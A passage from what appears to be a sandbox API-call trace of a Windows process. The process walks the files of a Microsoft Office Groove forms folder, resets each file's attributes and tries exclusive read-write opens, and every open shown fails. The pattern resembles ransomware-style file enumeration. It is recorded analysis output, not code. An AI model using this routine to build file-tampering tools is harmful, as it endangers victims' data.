dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.169] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.169] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.169] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.169] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Earthy.gif", dwFileAttributes=0x80) returned 0 [0137.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_earthy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.170] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.170] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePage.gif", dwFileAttributes=0x80) returned 0 [0137.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepage.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.171] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.171] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.171] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageBlank.gif", dwFileAttributes=0x80) returned 0 [0137.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepageblank.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.171] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.171] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.171] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageSlice.gif", dwFileAttributes=0x80) returned 0 [0137.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_FormsHomePageSlice.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_formshomepageslice.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.172] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_GreenTea.gif", dwFileAttributes=0x80) returned 0 [0137.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_greentea.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.173] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.173] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Groove.gif", dwFileAttributes=0x80) returned 0 [0137.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_groove.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.173] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.173] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.173] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_LightSpirit.gif", dwFileAttributes=0x80) returned 0 [0137.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_lightspirit.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.174] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_OliveGreen.gif", dwFileAttributes=0x80) returned 0 [0137.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_olivegreen.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.175] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Premium.gif", dwFileAttributes=0x80) returned 0 [0137.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_premium.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.175] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.175] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_SlateBlue.gif", dwFileAttributes=0x80) returned 0 [0137.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_slateblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.176] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.176] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.176] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_TexturedBlue.gif", dwFileAttributes=0x80) returned 0 [0137.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_texturedblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.176] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.176] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.176] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_VelvetRose.gif", dwFileAttributes=0x80) returned 0 [0137.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_velvetrose.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.177] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.177] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.178] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left.gif", dwFileAttributes=0x80) returned 0 [0137.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_left.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.178] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.178] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left_over.gif", dwFileAttributes=0x80) returned 0 [0137.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_left_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.179] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid.gif", dwFileAttributes=0x80) returned 0 [0137.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_mid.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.179] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid_over.gif", dwFileAttributes=0x80) returned 0 [0137.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_mid_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.180] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.180] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right.gif", dwFileAttributes=0x80) returned 0 [0137.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_right.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.181] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right_over.gif", dwFileAttributes=0x80) returned 0 [0137.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\button_right_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.181] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.181] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.181] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\CALENDAR.GIF", dwFileAttributes=0x80) returned 0 [0137.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\CALENDAR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\calendar.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.182] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.182] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.182] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\DELETE.GIF", dwFileAttributes=0x80) returned 0 [0137.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\DELETE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\delete.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.182] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.182] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.182] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ERROR.GIF", dwFileAttributes=0x80) returned 0 [0137.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ERROR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\error.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.183] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.183] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.183] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.183] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO", dwFileAttributes=0x80) returned 0 [0137.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.184] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.184] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.185] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.185] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS", dwFileAttributes=0x80) returned 0 [0137.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.185] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.185] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.185] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.185] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html", dwFileAttributes=0x80) returned 0 [0137.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.186] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.186] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.186] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 0 [0137.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsbrowserupgrade.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.188] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.188] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.188] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsColorChart.html", dwFileAttributes=0x80) returned 0 [0137.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formscolorchart.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.189] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.189] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 0 [0137.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsformtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 